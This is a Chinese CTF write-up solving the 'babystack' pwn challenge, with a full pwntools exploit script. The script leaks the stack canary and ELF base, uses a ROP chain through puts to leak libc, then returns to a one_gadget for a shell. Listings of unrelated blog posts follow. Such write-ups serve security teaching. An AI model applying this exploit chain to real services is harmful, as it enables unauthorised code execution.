babystack

首先检查一下保护

全保护开启,我们IDA分析一下。

main函数很简单,首先第一个read明显存在漏洞,如果不是以 \n 结尾会存在栈中地址的泄漏。

payload = 'A'*0x88+'A'   #这里多加一个A是因为canary的低字节为\x00

p.sendafter("What's your name: ",payload)

p.recvuntil('A'*0x88)

canary  = u64(p.recv(8))-ord('A')

elf_base = u64(p.recv(6).ljust(8,'\x00'))-0x910

print 'canary: '+hex(canary)

print 'elf_base: '+hex(elf_base)

第一个read我们泄漏了canary和elf的基地址。接下来我们用第二read 泄漏libc地址,控制程序返回main函数

pop_rdi_ret = 0x973

main = elf_base+0x080A

payload = 'A'*0x88 + p64(canary) + 'B'*8

payload += p64(elf_base+pop_rdi_ret) +p64(elf_base+elf.got['puts'])+ p64(elf_base+elf.plt['puts'])+p64(main)

p.sendafter('to say: ',payload)

p.recvline()

puts = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))

libc_base = puts - libc.symbols['puts']

print 'libc_base: '+hex(libc_base)

接下来我们就可以ret2onegadget了。

#coding:utf-8

from pwn import *

context.log_level = 'debug'

p = process('./babystack')

elf = ELF('./babystack')

libc = ELF('./libc-2.27.so')

#--------------------leak canary elf_base---------------#

payload = 'A'*0x88+'A'

p.sendafter("What's your name: ",payload)

p.recvuntil('A'*0x88)

canary  = u64(p.recv(8))-ord('A')

elf_base = u64(p.recv(6).ljust(8,'\x00'))-0x910

print 'canary: '+hex(canary)

print 'elf_base: '+hex(elf_base)

#——----------------leak libc_base-----------------------------#

pop_rdi_ret = 0x973

main = elf_base+0x080A

payload = 'A'*0x88 + p64(canary) + 'B'*8

payload += p64(elf_base+pop_rdi_ret) +p64(elf_base+elf.got['puts'])+ p64(elf_base+elf.plt['puts'])+p64(main)

p.sendafter('to say: ',payload)

p.recvline()

puts = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))

libc_base = puts - libc.symbols['puts']

print 'libc_base: '+hex(libc_base)

#---------------ret2 one_gadget----------------------------------#

one = [0x10a38c,0x4f322,0x4f2c5]

p.sendafter("What's your name: ",'AAAA')

payload = 'A'*0x88 + p64(canary) + 'B'*8 + p64(libc_base+one[0])

p.sendafter('to say: ',payload)

p.interactive()

baystack(ret2one_gadget)的更多相关文章

  1. Freebsd 编译内核

    # cd /usr/src/sys/i386/conf # cp GENERIC GENERIC.20060812# ee GENERIC 如果要加入ipf防火墙的话则加入options        ...

  2. snmp oid 和厂商对应关系

    <node oid="default" name="Unknown" type="workstation"/><node ...

  3. 鹏城杯_2018_treasure

    鹏城杯_2018_treasure 首先检查一下保护: IDA分析 我们先来看看settreasure()函数 申请了两个内存空间,并往sea中复制了shellcode 看看这个shellcode,不 ...

  4. 攻防世界pwn高手区——pwn1

    攻防世界 -- pwn1 攻防世界的一道pwn题,也有一段时间没有做pwn了,找了一道栈题热身,发现还是有些生疏了. 题目流程 拖入IDA中,题目流程如图所示,当v0为1时,存在栈溢出漏洞.在gdb中 ...

随机推荐

  1. (转)linux下的系统调用函数到内核函数的追踪

    转载网址:http://blog.csdn.net/maochengtao/article/details/23598433 使用的 glibc : glibc-2.17使用的 linux kerne ...

  2. Youcans 的第一篇博客

    这是我的第一篇博客. 今后我会将我的学习心得和总结在这里发布,与大家共享,共勉.

  3. 后端程序员之路 7、Zookeeper

    Zookeeper是hadoop的一个子项目,提供分布式应用程序协调服务. Apache ZooKeeper - Homehttps://zookeeper.apache.org/ zookeeper ...

  4. 使用Prometheus搞定微服务监控

    最近对服务进行监控,而当前监控最流行的数据库就是 Prometheus,同时 go-zero 默认接入也是这款数据库.今天就对 go-zero 是如何接入 Prometheus ,以及开发者如何自己定 ...

  5. c++类的简介

    一 类的定义 在c++中,我们使用"类"来描述"对象",可以说"类"的实现是c++OOP的核心. 类中包括对象的"属性" ...

  6. vue3 一些关键属性

    环境搭建 尤大开发了一个项目构建工具vite npm init vite-app <project-name> cd <project-name> npm install np ...

  7. uni-app创建项目

    下载 HBuilderX   下载地址(https://www.dcloud.io/hbuilderx.html) HBuilderX是通用的前端开发工具,但为uni-app做了特别强化. 创建uni ...

  8. docker swarm模式跨主机连接

    一.前言 当我们开发好微服务之后,考虑到灵活快速持续部署的需要,通常会考虑将其Docker镜像化并在Docker环境下运行.由于微服务个数通常会较多,把所有微服务部署在一台docker主机上是不现实的 ...

  9. Java I/O流 02

    IO流·字节流 IO流概述及其分类 * A:概念 * IO流用来处理设备之间的数据传输 * Java对数据的操作是通过流操作的 * Java用于操作流的类都在IO包中 * 流按流向分为两种输入流.输出 ...

  10. AI人脸匹对

    人脸匹对 技术 调用到百度的AI接口,layui的图片上传,栅格化布局 核心代码 纯py代码运行 # encoding:utf-8 from aip import AipFace import bas ...